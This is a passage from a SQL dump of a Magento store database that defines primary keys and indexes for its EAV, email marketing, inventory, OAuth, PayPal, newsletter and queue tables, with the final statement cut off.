ALTER TABLE `eav_entity`
  ADD PRIMARY KEY (`entity_id`),
  ADD KEY `EAV_ENTITY_ENTITY_TYPE_ID` (`entity_type_id`),
  ADD KEY `EAV_ENTITY_STORE_ID` (`store_id`);

--
-- Indexes for table `eav_entity_attribute`
--
ALTER TABLE `eav_entity_attribute`
  ADD PRIMARY KEY (`entity_attribute_id`),
  ADD UNIQUE KEY `EAV_ENTITY_ATTRIBUTE_ATTRIBUTE_SET_ID_ATTRIBUTE_ID` (`attribute_set_id`,`attribute_id`),
  ADD UNIQUE KEY `EAV_ENTITY_ATTRIBUTE_ATTRIBUTE_GROUP_ID_ATTRIBUTE_ID` (`attribute_group_id`,`attribute_id`),
  ADD KEY `EAV_ENTITY_ATTRIBUTE_ATTRIBUTE_SET_ID_SORT_ORDER` (`attribute_set_id`,`sort_order`),
  ADD KEY `EAV_ENTITY_ATTRIBUTE_ATTRIBUTE_ID` (`attribute_id`);

--
-- Indexes for table `eav_entity_datetime`
--
ALTER TABLE `eav_entity_datetime`
  ADD PRIMARY KEY (`value_id`),
  ADD UNIQUE KEY `EAV_ENTITY_DATETIME_ENTITY_ID_ATTRIBUTE_ID_STORE_ID` (`entity_id`,`attribute_id`,`store_id`),
  ADD KEY `EAV_ENTITY_DATETIME_STORE_ID` (`store_id`),
  ADD KEY `EAV_ENTITY_DATETIME_ATTRIBUTE_ID_VALUE` (`attribute_id`,`value`),
  ADD KEY `EAV_ENTITY_DATETIME_ENTITY_TYPE_ID_VALUE` (`entity_type_id`,`value`);

--
-- Indexes for table `eav_entity_decimal`
--
ALTER TABLE `eav_entity_decimal`
  ADD PRIMARY KEY (`value_id`),
  ADD UNIQUE KEY `EAV_ENTITY_DECIMAL_ENTITY_ID_ATTRIBUTE_ID_STORE_ID` (`entity_id`,`attribute_id`,`store_id`),
  ADD KEY `EAV_ENTITY_DECIMAL_STORE_ID` (`store_id`),
  ADD KEY `EAV_ENTITY_DECIMAL_ATTRIBUTE_ID_VALUE` (`attribute_id`,`value`),
  ADD KEY `EAV_ENTITY_DECIMAL_ENTITY_TYPE_ID_VALUE` (`entity_type_id`,`value`);

--
-- Indexes for table `eav_entity_int`
--
ALTER TABLE `eav_entity_int`
  ADD PRIMARY KEY (`value_id`),
  ADD UNIQUE KEY `EAV_ENTITY_INT_ENTITY_ID_ATTRIBUTE_ID_STORE_ID` (`entity_id`,`attribute_id`,`store_id`),
  ADD KEY `EAV_ENTITY_INT_STORE_ID` (`store_id`),
  ADD KEY `EAV_ENTITY_INT_ATTRIBUTE_ID_VALUE` (`attribute_id`,`value`),
  ADD KEY `EAV_ENTITY_INT_ENTITY_TYPE_ID_VALUE` (`entity_type_id`,`value`);

--
-- Indexes for table `eav_entity_store`
--
ALTER TABLE `eav_entity_store`
  ADD PRIMARY KEY (`entity_store_id`),
  ADD KEY `EAV_ENTITY_STORE_ENTITY_TYPE_ID` (`entity_type_id`),
  ADD KEY `EAV_ENTITY_STORE_STORE_ID` (`store_id`);

--
-- Indexes for table `eav_entity_text`
--
ALTER TABLE `eav_entity_text`
  ADD PRIMARY KEY (`value_id`),
  ADD UNIQUE KEY `EAV_ENTITY_TEXT_ENTITY_ID_ATTRIBUTE_ID_STORE_ID` (`entity_id`,`attribute_id`,`store_id`),
  ADD KEY `EAV_ENTITY_TEXT_ENTITY_TYPE_ID` (`entity_type_id`),
  ADD KEY `EAV_ENTITY_TEXT_ATTRIBUTE_ID` (`attribute_id`),
  ADD KEY `EAV_ENTITY_TEXT_STORE_ID` (`store_id`);

--
-- Indexes for table `eav_entity_type`
--
ALTER TABLE `eav_entity_type`
  ADD PRIMARY KEY (`entity_type_id`),
  ADD KEY `EAV_ENTITY_TYPE_ENTITY_TYPE_CODE` (`entity_type_code`);

--
-- Indexes for table `eav_entity_varchar`
--
ALTER TABLE `eav_entity_varchar`
  ADD PRIMARY KEY (`value_id`),
  ADD UNIQUE KEY `EAV_ENTITY_VARCHAR_ENTITY_ID_ATTRIBUTE_ID_STORE_ID` (`entity_id`,`attribute_id`,`store_id`),
  ADD KEY `EAV_ENTITY_VARCHAR_STORE_ID` (`store_id`),
  ADD KEY `EAV_ENTITY_VARCHAR_ATTRIBUTE_ID_VALUE` (`attribute_id`,`value`),
  ADD KEY `EAV_ENTITY_VARCHAR_ENTITY_TYPE_ID_VALUE` (`entity_type_id`,`value`);

--
-- Indexes for table `eav_form_element`
--
ALTER TABLE `eav_form_element`
  ADD PRIMARY KEY (`element_id`),
  ADD UNIQUE KEY `EAV_FORM_ELEMENT_TYPE_ID_ATTRIBUTE_ID` (`type_id`,`attribute_id`),
  ADD KEY `EAV_FORM_ELEMENT_FIELDSET_ID` (`fieldset_id`),
  ADD KEY `EAV_FORM_ELEMENT_ATTRIBUTE_ID` (`attribute_id`);

--
-- Indexes for table `eav_form_fieldset`
--
ALTER TABLE `eav_form_fieldset`
  ADD PRIMARY KEY (`fieldset_id`),
  ADD UNIQUE KEY `EAV_FORM_FIELDSET_TYPE_ID_CODE` (`type_id`,`code`);

--
-- Indexes for table `eav_form_fieldset_label`
--
ALTER TABLE `eav_form_fieldset_label`
  ADD PRIMARY KEY (`fieldset_id`,`store_id`),
  ADD KEY `EAV_FORM_FIELDSET_LABEL_STORE_ID` (`store_id`);

--
-- Indexes for table `eav_form_type`
--
ALTER TABLE `eav_form_type`
  ADD PRIMARY KEY (`type_id`),
  ADD UNIQUE KEY `EAV_FORM_TYPE_CODE_THEME_STORE_ID` (`code`,`theme`,`store_id`),
  ADD KEY `EAV_FORM_TYPE_STORE_ID` (`store_id`);

--
-- Indexes for table `eav_form_type_entity`
--
ALTER TABLE `eav_form_type_entity`
  ADD PRIMARY KEY (`type_id`,`entity_type_id`),
  ADD KEY `EAV_FORM_TYPE_ENTITY_ENTITY_TYPE_ID` (`entity_type_id`);

--
-- Indexes for table `email_abandoned_cart`
--
ALTER TABLE `email_abandoned_cart`
  ADD PRIMARY KEY (`id`),
  ADD KEY `EMAIL_ABANDONED_CART_QUOTE_ID` (`quote_id`),
  ADD KEY `EMAIL_ABANDONED_CART_STORE_ID` (`store_id`),
  ADD KEY `EMAIL_ABANDONED_CART_CUSTOMER_ID` (`customer_id`),
  ADD KEY `EMAIL_ABANDONED_CART_EMAIL` (`email`);

--
-- Indexes for table `email_automation`
--
ALTER TABLE `email_automation`
  ADD PRIMARY KEY (`id`),
  ADD KEY `EMAIL_AUTOMATION_AUTOMATION_TYPE` (`automation_type`),
  ADD KEY `EMAIL_AUTOMATION_ENROLMENT_STATUS` (`enrolment_status`),
  ADD KEY `EMAIL_AUTOMATION_TYPE_ID` (`type_id`),
  ADD KEY `EMAIL_AUTOMATION_EMAIL` (`email`),
  ADD KEY `EMAIL_AUTOMATION_PROGRAM_ID` (`program_id`),
  ADD KEY `EMAIL_AUTOMATION_CREATED_AT` (`created_at`),
  ADD KEY `EMAIL_AUTOMATION_UPDATED_AT` (`updated_at`),
  ADD KEY `EMAIL_AUTOMATION_WEBSITE_ID` (`website_id`);

--
-- Indexes for table `email_campaign`
--
ALTER TABLE `email_campaign`
  ADD PRIMARY KEY (`id`),
  ADD KEY `EMAIL_CAMPAIGN_STORE_ID` (`store_id`),
  ADD KEY `EMAIL_CAMPAIGN_CAMPAIGN_ID` (`campaign_id`),
  ADD KEY `EMAIL_CAMPAIGN_EMAIL` (`email`),
  ADD KEY `EMAIL_CAMPAIGN_SEND_ID` (`send_id`),
  ADD KEY `EMAIL_CAMPAIGN_SEND_STATUS` (`send_status`),
  ADD KEY `EMAIL_CAMPAIGN_CREATED_AT` (`created_at`),
  ADD KEY `EMAIL_CAMPAIGN_UPDATED_AT` (`updated_at`),
  ADD KEY `EMAIL_CAMPAIGN_SENT_AT` (`sent_at`),
  ADD KEY `EMAIL_CAMPAIGN_EVENT_NAME` (`event_name`),
  ADD KEY `EMAIL_CAMPAIGN_MESSAGE` (`message`),
  ADD KEY `EMAIL_CAMPAIGN_QUOTE_ID` (`quote_id`),
  ADD KEY `EMAIL_CAMPAIGN_CUSTOMER_ID` (`customer_id`);

--
-- Indexes for table `email_catalog`
--
ALTER TABLE `email_catalog`
  ADD PRIMARY KEY (`id`),
  ADD KEY `EMAIL_CATALOG_PRODUCT_ID` (`product_id`),
  ADD KEY `EMAIL_CATALOG_PROCESSED` (`processed`),
  ADD KEY `EMAIL_CATALOG_CREATED_AT` (`created_at`),
  ADD KEY `EMAIL_CATALOG_UPDATED_AT` (`updated_at`),
  ADD KEY `EMAIL_CATALOG_LAST_IMPORTED_AT` (`last_imported_at`);

--
-- Indexes for table `email_contact`
--
ALTER TABLE `email_contact`
  ADD PRIMARY KEY (`email_contact_id`),
  ADD KEY `EMAIL_CONTACT_EMAIL_CONTACT_ID` (`email_contact_id`),
  ADD KEY `EMAIL_CONTACT_IS_GUEST` (`is_guest`),
  ADD KEY `EMAIL_CONTACT_CUSTOMER_ID` (`customer_id`),
  ADD KEY `EMAIL_CONTACT_WEBSITE_ID` (`website_id`),
  ADD KEY `EMAIL_CONTACT_IS_SUBSCRIBER` (`is_subscriber`),
  ADD KEY `EMAIL_CONTACT_SUBSCRIBER_STATUS` (`subscriber_status`),
  ADD KEY `EMAIL_CONTACT_EMAIL_IMPORTED` (`email_imported`),
  ADD KEY `EMAIL_CONTACT_SUBSCRIBER_IMPORTED` (`subscriber_imported`),
  ADD KEY `EMAIL_CONTACT_SUPPRESSED` (`suppressed`),
  ADD KEY `EMAIL_CONTACT_EMAIL` (`email`),
  ADD KEY `EMAIL_CONTACT_CONTACT_ID` (`contact_id`);

--
-- Indexes for table `email_contact_consent`
--
ALTER TABLE `email_contact_consent`
  ADD PRIMARY KEY (`id`),
  ADD KEY `EMAIL_CONTACT_CONSENT_EMAIL_CONTACT_ID` (`email_contact_id`);

--
-- Indexes for table `email_coupon_attribute`
--
ALTER TABLE `email_coupon_attribute`
  ADD PRIMARY KEY (`id`),
  ADD KEY `EMAIL_COUPON_ATTRIBUTE_COUPON_ID` (`salesrule_coupon_id`),
  ADD KEY `EMAIL_COUPON_ATTRIBUTE_EMAIL` (`email`);

--
-- Indexes for table `email_failed_auth`
--
ALTER TABLE `email_failed_auth`
  ADD PRIMARY KEY (`id`),
  ADD KEY `EMAIL_AUTH_EDC_STORE_ID` (`store_id`);

--
-- Indexes for table `email_importer`
--
ALTER TABLE `email_importer`
  ADD PRIMARY KEY (`id`),
  ADD KEY `EMAIL_IMPORTER_IMPORT_TYPE` (`import_type`),
  ADD KEY `EMAIL_IMPORTER_WEBSITE_ID` (`website_id`),
  ADD KEY `EMAIL_IMPORTER_IMPORT_STATUS` (`import_status`),
  ADD KEY `EMAIL_IMPORTER_IMPORT_MODE` (`import_mode`),
  ADD KEY `EMAIL_IMPORTER_CREATED_AT` (`created_at`),
  ADD KEY `EMAIL_IMPORTER_UPDATED_AT` (`updated_at`),
  ADD KEY `EMAIL_IMPORTER_IMPORT_ID` (`import_id`),
  ADD KEY `EMAIL_IMPORTER_IMPORT_STARTED` (`import_started`),
  ADD KEY `EMAIL_IMPORTER_IMPORT_FINISHED` (`import_finished`);

--
-- Indexes for table `email_order`
--
ALTER TABLE `email_order`
  ADD PRIMARY KEY (`email_order_id`),
  ADD KEY `EMAIL_ORDER_STORE_ID` (`store_id`),
  ADD KEY `EMAIL_ORDER_QUOTE_ID` (`quote_id`),
  ADD KEY `EMAIL_ORDER_EMAIL_IMPORTED` (`email_imported`),
  ADD KEY `EMAIL_ORDER_ORDER_STATUS` (`order_status`),
  ADD KEY `EMAIL_ORDER_MODIFIED` (`modified`),
  ADD KEY `EMAIL_ORDER_UPDATED_AT` (`updated_at`),
  ADD KEY `EMAIL_ORDER_CREATED_AT` (`created_at`),
  ADD KEY `EMAIL_ORDER_ORDER_ID_SALES_ORDER_ENTITY_ID` (`order_id`);

--
-- Indexes for table `email_review`
--
ALTER TABLE `email_review`
  ADD PRIMARY KEY (`id`),
  ADD KEY `EMAIL_REVIEW_REVIEW_ID` (`review_id`),
  ADD KEY `EMAIL_REVIEW_CUSTOMER_ID` (`customer_id`),
  ADD KEY `EMAIL_REVIEW_STORE_ID` (`store_id`),
  ADD KEY `EMAIL_REVIEW_REVIEW_IMPORTED` (`review_imported`),
  ADD KEY `EMAIL_REVIEW_CREATED_AT` (`created_at`),
  ADD KEY `EMAIL_REVIEW_UPDATED_AT` (`updated_at`);

--
-- Indexes for table `email_rules`
--
ALTER TABLE `email_rules`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `email_template`
--
ALTER TABLE `email_template`
  ADD PRIMARY KEY (`template_id`),
  ADD UNIQUE KEY `EMAIL_TEMPLATE_TEMPLATE_CODE` (`template_code`),
  ADD KEY `EMAIL_TEMPLATE_ADDED_AT` (`added_at`),
  ADD KEY `EMAIL_TEMPLATE_MODIFIED_AT` (`modified_at`);

--
-- Indexes for table `email_wishlist`
--
ALTER TABLE `email_wishlist`
  ADD PRIMARY KEY (`id`),
  ADD KEY `EMAIL_WISHLIST_WISHLIST_ID` (`wishlist_id`),
  ADD KEY `EMAIL_WISHLIST_ITEM_COUNT` (`item_count`),
  ADD KEY `EMAIL_WISHLIST_CUSTOMER_ID` (`customer_id`),
  ADD KEY `EMAIL_WISHLIST_WISHLIST_MODIFIED` (`wishlist_modified`),
  ADD KEY `EMAIL_WISHLIST_WISHLIST_IMPORTED` (`wishlist_imported`),
  ADD KEY `EMAIL_WISHLIST_CREATED_AT` (`created_at`),
  ADD KEY `EMAIL_WISHLIST_UPDATED_AT` (`updated_at`),
  ADD KEY `EMAIL_WISHLIST_STORE_ID` (`store_id`);

--
-- Indexes for table `flag`
--
ALTER TABLE `flag`
  ADD PRIMARY KEY (`flag_id`),
  ADD KEY `FLAG_LAST_UPDATE` (`last_update`);

--
-- Indexes for table `gift_message`
--
ALTER TABLE `gift_message`
  ADD PRIMARY KEY (`gift_message_id`);

--
-- Indexes for table `googleoptimizer_code`
--
ALTER TABLE `googleoptimizer_code`
  ADD PRIMARY KEY (`code_id`),
  ADD UNIQUE KEY `GOOGLEOPTIMIZER_CODE_STORE_ID_ENTITY_ID_ENTITY_TYPE` (`store_id`,`entity_id`,`entity_type`);

--
-- Indexes for table `importexport_importdata`
--
ALTER TABLE `importexport_importdata`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `import_history`
--
ALTER TABLE `import_history`
  ADD PRIMARY KEY (`history_id`);

--
-- Indexes for table `indexer_state`
--
ALTER TABLE `indexer_state`
  ADD PRIMARY KEY (`state_id`),
  ADD KEY `INDEXER_STATE_INDEXER_ID` (`indexer_id`);

--
-- Indexes for table `integration`
--
ALTER TABLE `integration`
  ADD PRIMARY KEY (`integration_id`),
  ADD UNIQUE KEY `INTEGRATION_NAME` (`name`),
  ADD UNIQUE KEY `INTEGRATION_CONSUMER_ID` (`consumer_id`);

--
-- Indexes for table `inventory_low_stock_notification_configuration`
--
ALTER TABLE `inventory_low_stock_notification_configuration`
  ADD PRIMARY KEY (`source_code`,`sku`);

--
-- Indexes for table `inventory_reservation`
--
ALTER TABLE `inventory_reservation`
  ADD PRIMARY KEY (`reservation_id`),
  ADD KEY `INVENTORY_RESERVATION_STOCK_ID_SKU_QUANTITY` (`stock_id`,`sku`,`quantity`);

--
-- Indexes for table `inventory_shipment_source`
--
ALTER TABLE `inventory_shipment_source`
  ADD PRIMARY KEY (`shipment_id`);

--
-- Indexes for table `inventory_source`
--
ALTER TABLE `inventory_source`
  ADD PRIMARY KEY (`source_code`);

--
-- Indexes for table `inventory_source_carrier_link`
--
ALTER TABLE `inventory_source_carrier_link`
  ADD PRIMARY KEY (`link_id`),
  ADD KEY `INV_SOURCE_CARRIER_LNK_SOURCE_CODE_INV_SOURCE_SOURCE_CODE` (`source_code`);

--
-- Indexes for table `inventory_source_item`
--
ALTER TABLE `inventory_source_item`
  ADD PRIMARY KEY (`source_item_id`),
  ADD UNIQUE KEY `INVENTORY_SOURCE_ITEM_SOURCE_CODE_SKU` (`source_code`,`sku`),
  ADD KEY `INVENTORY_SOURCE_ITEM_SKU_SOURCE_CODE_QUANTITY` (`sku`,`source_code`,`quantity`);

--
-- Indexes for table `inventory_source_stock_link`
--
ALTER TABLE `inventory_source_stock_link`
  ADD PRIMARY KEY (`link_id`),
  ADD UNIQUE KEY `INVENTORY_SOURCE_STOCK_LINK_STOCK_ID_SOURCE_CODE` (`stock_id`,`source_code`),
  ADD KEY `INV_SOURCE_STOCK_LNK_SOURCE_CODE_INV_SOURCE_SOURCE_CODE` (`source_code`),
  ADD KEY `INVENTORY_SOURCE_STOCK_LINK_STOCK_ID_PRIORITY` (`stock_id`,`priority`);

--
-- Indexes for table `inventory_stock`
--
ALTER TABLE `inventory_stock`
  ADD PRIMARY KEY (`stock_id`);

--
-- Indexes for table `inventory_stock_sales_channel`
--
ALTER TABLE `inventory_stock_sales_channel`
  ADD PRIMARY KEY (`type`,`code`),
  ADD KEY `INVENTORY_STOCK_SALES_CHANNEL_STOCK_ID_INVENTORY_STOCK_STOCK_ID` (`stock_id`);

--
-- Indexes for table `klarna_core_order`
--
ALTER TABLE `klarna_core_order`
  ADD PRIMARY KEY (`id`),
  ADD KEY `KLARNA_CORE_ORDER_IS_ACKNOWLEDGED` (`is_acknowledged`),
  ADD KEY `KLARNA_CORE_ORDER_ORDER_ID` (`order_id`);

--
-- Indexes for table `klarna_payments_quote`
--
ALTER TABLE `klarna_payments_quote`
  ADD PRIMARY KEY (`payments_quote_id`),
  ADD KEY `KLARNA_PAYMENTS_QUOTE_QUOTE_ID` (`quote_id`);

--
-- Indexes for table `layout_link`
--
ALTER TABLE `layout_link`
  ADD PRIMARY KEY (`layout_link_id`),
  ADD KEY `LAYOUT_LINK_THEME_ID_THEME_THEME_ID` (`theme_id`),
  ADD KEY `LAYOUT_LINK_LAYOUT_UPDATE_ID` (`layout_update_id`),
  ADD KEY `LAYOUT_LINK_STORE_ID_THEME_ID_LAYOUT_UPDATE_ID_IS_TEMPORARY` (`store_id`,`theme_id`,`layout_update_id`,`is_temporary`);

--
-- Indexes for table `layout_update`
--
ALTER TABLE `layout_update`
  ADD PRIMARY KEY (`layout_update_id`),
  ADD KEY `LAYOUT_UPDATE_HANDLE` (`handle`);

--
-- Indexes for table `magento_acknowledged_bulk`
--
ALTER TABLE `magento_acknowledged_bulk`
  ADD PRIMARY KEY (`id`),
  ADD UNIQUE KEY `MAGENTO_ACKNOWLEDGED_BULK_BULK_UUID` (`bulk_uuid`);

--
-- Indexes for table `magento_bulk`
--
ALTER TABLE `magento_bulk`
  ADD PRIMARY KEY (`id`),
  ADD UNIQUE KEY `MAGENTO_BULK_UUID` (`uuid`),
  ADD KEY `MAGENTO_BULK_USER_ID` (`user_id`);

--
-- Indexes for table `magento_operation`
--
ALTER TABLE `magento_operation`
  ADD PRIMARY KEY (`id`),
  ADD KEY `MAGENTO_OPERATION_BULK_UUID_ERROR_CODE` (`bulk_uuid`,`error_code`);

--
-- Indexes for table `mageplaza_bannerslider_banner`
--
ALTER TABLE `mageplaza_bannerslider_banner`
  ADD PRIMARY KEY (`banner_id`);
ALTER TABLE `mageplaza_bannerslider_banner` ADD FULLTEXT KEY `MAGEPLAZA_BANNERSLIDER_BANNER_NAME_IMAGE_URL_BANNER` (`name`,`image`,`url_banner`);

--
-- Indexes for table `mageplaza_bannerslider_banner_slider`
--
ALTER TABLE `mageplaza_bannerslider_banner_slider`
  ADD PRIMARY KEY (`slider_id`,`banner_id`),
  ADD UNIQUE KEY `MAGEPLAZA_BANNERSLIDER_BANNER_SLIDER_SLIDER_ID_BANNER_ID` (`slider_id`,`banner_id`),
  ADD KEY `MAGEPLAZA_BANNERSLIDER_BANNER_SLIDER_SLIDER_ID` (`slider_id`),
  ADD KEY `MAGEPLAZA_BANNERSLIDER_BANNER_SLIDER_BANNER_ID` (`banner_id`);

--
-- Indexes for table `mageplaza_bannerslider_slider`
--
ALTER TABLE `mageplaza_bannerslider_slider`
  ADD PRIMARY KEY (`slider_id`);

--
-- Indexes for table `media_gallery_asset`
--
ALTER TABLE `media_gallery_asset`
  ADD PRIMARY KEY (`id`),
  ADD UNIQUE KEY `MEDIA_GALLERY_ASSET_PATH` (`path`),
  ADD KEY `MEDIA_GALLERY_ASSET_ID` (`id`);

--
-- Indexes for table `media_gallery_asset_keyword`
--
ALTER TABLE `media_gallery_asset_keyword`
  ADD PRIMARY KEY (`keyword_id`,`asset_id`),
  ADD KEY `MEDIA_GALLERY_ASSET_KEYWORD_ASSET_ID` (`asset_id`),
  ADD KEY `MEDIA_GALLERY_ASSET_KEYWORD_KEYWORD_ID` (`keyword_id`);

--
-- Indexes for table `media_gallery_keyword`
--
ALTER TABLE `media_gallery_keyword`
  ADD PRIMARY KEY (`id`),
  ADD UNIQUE KEY `MEDIA_GALLERY_KEYWORD_KEYWORD` (`keyword`),
  ADD KEY `MEDIA_GALLERY_KEYWORD_ID` (`id`);

--
-- Indexes for table `msp_tfa_country_codes`
--
ALTER TABLE `msp_tfa_country_codes`
  ADD PRIMARY KEY (`msp_tfa_country_codes_id`),
  ADD KEY `MSP_TFA_COUNTRY_CODES_CODE` (`code`(128));

--
-- Indexes for table `msp_tfa_trusted`
--
ALTER TABLE `msp_tfa_trusted`
  ADD PRIMARY KEY (`msp_tfa_trusted_id`),
  ADD KEY `MSP_TFA_TRUSTED_USER_ID_ADMIN_USER_USER_ID` (`user_id`);

--
-- Indexes for table `msp_tfa_user_config`
--
ALTER TABLE `msp_tfa_user_config`
  ADD PRIMARY KEY (`msp_tfa_user_config_id`),
  ADD KEY `MSP_TFA_USER_CONFIG_USER_ID_ADMIN_USER_USER_ID` (`user_id`);

--
-- Indexes for table `mview_state`
--
ALTER TABLE `mview_state`
  ADD PRIMARY KEY (`state_id`),
  ADD KEY `MVIEW_STATE_VIEW_ID` (`view_id`),
  ADD KEY `MVIEW_STATE_MODE` (`mode`);

--
-- Indexes for table `newsletter_problem`
--
ALTER TABLE `newsletter_problem`
  ADD PRIMARY KEY (`problem_id`),
  ADD KEY `NEWSLETTER_PROBLEM_SUBSCRIBER_ID` (`subscriber_id`),
  ADD KEY `NEWSLETTER_PROBLEM_QUEUE_ID` (`queue_id`);

--
-- Indexes for table `newsletter_queue`
--
ALTER TABLE `newsletter_queue`
  ADD PRIMARY KEY (`queue_id`),
  ADD KEY `NEWSLETTER_QUEUE_TEMPLATE_ID` (`template_id`);

--
-- Indexes for table `newsletter_queue_link`
--
ALTER TABLE `newsletter_queue_link`
  ADD PRIMARY KEY (`queue_link_id`),
  ADD KEY `NEWSLETTER_QUEUE_LINK_SUBSCRIBER_ID` (`subscriber_id`),
  ADD KEY `NEWSLETTER_QUEUE_LINK_QUEUE_ID_LETTER_SENT_AT` (`queue_id`,`letter_sent_at`);

--
-- Indexes for table `newsletter_queue_store_link`
--
ALTER TABLE `newsletter_queue_store_link`
  ADD PRIMARY KEY (`queue_id`,`store_id`),
  ADD KEY `NEWSLETTER_QUEUE_STORE_LINK_STORE_ID` (`store_id`);

--
-- Indexes for table `newsletter_subscriber`
--
ALTER TABLE `newsletter_subscriber`
  ADD PRIMARY KEY (`subscriber_id`),
  ADD KEY `NEWSLETTER_SUBSCRIBER_CUSTOMER_ID` (`customer_id`),
  ADD KEY `NEWSLETTER_SUBSCRIBER_STORE_ID` (`store_id`),
  ADD KEY `NEWSLETTER_SUBSCRIBER_SUBSCRIBER_EMAIL` (`subscriber_email`);

--
-- Indexes for table `newsletter_template`
--
ALTER TABLE `newsletter_template`
  ADD PRIMARY KEY (`template_id`),
  ADD KEY `NEWSLETTER_TEMPLATE_TEMPLATE_ACTUAL` (`template_actual`),
  ADD KEY `NEWSLETTER_TEMPLATE_ADDED_AT` (`added_at`),
  ADD KEY `NEWSLETTER_TEMPLATE_MODIFIED_AT` (`modified_at`);

--
-- Indexes for table `oauth_consumer`
--
ALTER TABLE `oauth_consumer`
  ADD PRIMARY KEY (`entity_id`),
  ADD UNIQUE KEY `OAUTH_CONSUMER_KEY` (`key`),
  ADD UNIQUE KEY `OAUTH_CONSUMER_SECRET` (`secret`),
  ADD KEY `OAUTH_CONSUMER_CREATED_AT` (`created_at`),
  ADD KEY `OAUTH_CONSUMER_UPDATED_AT` (`updated_at`);

--
-- Indexes for table `oauth_nonce`
--
ALTER TABLE `oauth_nonce`
  ADD UNIQUE KEY `OAUTH_NONCE_NONCE_CONSUMER_ID` (`nonce`,`consumer_id`),
  ADD KEY `OAUTH_NONCE_CONSUMER_ID_OAUTH_CONSUMER_ENTITY_ID` (`consumer_id`),
  ADD KEY `OAUTH_NONCE_TIMESTAMP` (`timestamp`);

--
-- Indexes for table `oauth_token`
--
ALTER TABLE `oauth_token`
  ADD PRIMARY KEY (`entity_id`),
  ADD UNIQUE KEY `OAUTH_TOKEN_TOKEN` (`token`),
  ADD KEY `OAUTH_TOKEN_ADMIN_ID_ADMIN_USER_USER_ID` (`admin_id`),
  ADD KEY `OAUTH_TOKEN_CUSTOMER_ID_CUSTOMER_ENTITY_ENTITY_ID` (`customer_id`),
  ADD KEY `OAUTH_TOKEN_CONSUMER_ID` (`consumer_id`);

--
-- Indexes for table `oauth_token_request_log`
--
ALTER TABLE `oauth_token_request_log`
  ADD PRIMARY KEY (`log_id`),
  ADD UNIQUE KEY `OAUTH_TOKEN_REQUEST_LOG_USER_NAME_USER_TYPE` (`user_name`,`user_type`);

--
-- Indexes for table `password_reset_request_event`
--
ALTER TABLE `password_reset_request_event`
  ADD PRIMARY KEY (`id`),
  ADD KEY `PASSWORD_RESET_REQUEST_EVENT_ACCOUNT_REFERENCE` (`account_reference`),
  ADD KEY `PASSWORD_RESET_REQUEST_EVENT_CREATED_AT` (`created_at`);

--
-- Indexes for table `patch_list`
--
ALTER TABLE `patch_list`
  ADD PRIMARY KEY (`patch_id`);

--
-- Indexes for table `paypal_billing_agreement`
--
ALTER TABLE `paypal_billing_agreement`
  ADD PRIMARY KEY (`agreement_id`),
  ADD KEY `PAYPAL_BILLING_AGREEMENT_CUSTOMER_ID` (`customer_id`),
  ADD KEY `PAYPAL_BILLING_AGREEMENT_STORE_ID` (`store_id`);

--
-- Indexes for table `paypal_billing_agreement_order`
--
ALTER TABLE `paypal_billing_agreement_order`
  ADD PRIMARY KEY (`agreement_id`,`order_id`),
  ADD KEY `PAYPAL_BILLING_AGREEMENT_ORDER_ORDER_ID` (`order_id`);

--
-- Indexes for table `paypal_cert`
--
ALTER TABLE `paypal_cert`
  ADD PRIMARY KEY (`cert_id`),
  ADD KEY `PAYPAL_CERT_WEBSITE_ID` (`website_id`);

--
-- Indexes for table `paypal_payment_transaction`
--
ALTER TABLE `paypal_payment_transaction`
  ADD PRIMARY KEY (`transaction_id`),
  ADD UNIQUE KEY `PAYPAL_PAYMENT_TRANSACTION_TXN_ID` (`txn_id`);

--
-- Indexes for table `paypal_settlement_report`
--
ALTER TABLE `paypal_settlement_report`
  ADD PRIMARY KEY (`report_id`),
  ADD UNIQUE KEY `PAYPAL_SETTLEMENT_REPORT_REPORT_DATE_ACCOUNT_ID` (`report_date`,`account_id`);

--
-- Indexes for table `paypal_settlement_report_row`
--
ALTER TABLE `paypal_settlement_report_row`
  ADD PRIMARY KEY (`row_id`),
  ADD KEY `PAYPAL_SETTLEMENT_REPORT_ROW_REPORT_ID` (`report_id`);

--
-- Indexes for table `persistent_session`
--
ALTER TABLE `persistent_session`
  ADD PRIMARY KEY (`persistent_id`),
  ADD UNIQUE KEY `PERSISTENT_SESSION_KEY` (`key`),
  ADD UNIQUE KEY `PERSISTENT_SESSION_CUSTOMER_ID` (`customer_id`),
  ADD KEY `PERSISTENT_SESSION_WEBSITE_ID_STORE_WEBSITE_WEBSITE_ID` (`website_id`),
  ADD KEY `PERSISTENT_SESSION_UPDATED_AT` (`updated_at`);

--
-- Indexes for table `product_alert_price`
--
ALTER TABLE `product_alert_price`
  ADD PRIMARY KEY (`alert_price_id`),
  ADD KEY `PRODUCT_ALERT_PRICE_CUSTOMER_ID` (`customer_id`),
  ADD KEY `PRODUCT_ALERT_PRICE_PRODUCT_ID` (`product_id`),
  ADD KEY `PRODUCT_ALERT_PRICE_WEBSITE_ID` (`website_id`),
  ADD KEY `PRODUCT_ALERT_PRICE_STORE_ID` (`store_id`);

--
-- Indexes for table `product_alert_stock`
--
ALTER TABLE `product_alert_stock`
  ADD PRIMARY KEY (`alert_stock_id`),
  ADD KEY `PRODUCT_ALERT_STOCK_CUSTOMER_ID` (`customer_id`),
  ADD KEY `PRODUCT_ALERT_STOCK_PRODUCT_ID` (`product_id`),
  ADD KEY `PRODUCT_ALERT_STOCK_WEBSITE_ID` (`website_id`),
  ADD KEY `PRODUCT_ALERT_STOCK_STORE_ID` (`store_id`);

--
-- Indexes for table `queue`
--
ALTER TABLE `queue`
  ADD PRIMARY KEY (`id`),
  ADD UNIQUE KEY `QUEUE_NAME` (`name`);

--
-- Indexes for table `queue_lock`
--
ALTER TABLE `queue_lock`
  ADD PRIMARY KEY (`id`),
  ADD UNIQUE KEY `QUEUE_LOCK_MESSAGE_CODE` (`message_code`);

--
-- Indexes for table `queue_message`
--
ALTER TABLE `queue_message`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `queue_message_status`
--
ALTER TABLE `queue_message_status`
  ADD PRIMARY KEY (`id`),
  ADD UNIQUE KEY `QUEUE_MESSAGE_STATUS_QUEUE_ID_MESSAGE_ID` (`queue_id`,`message_id`),
  ADD KEY `QUEUE_MESSAGE_STATUS_MESSAGE_ID_QUEUE_MESSAGE_ID` (`message_id`),
  ADD KEY `QUEUE_MESSAGE_STATUS_STATUS_UPDATED_AT` (`status`,`updated_at`);

--
-- Indexes for table `quote`
--
ALTER TABLE `quote`
  ADD PRIMARY KEY (`entity_id`),
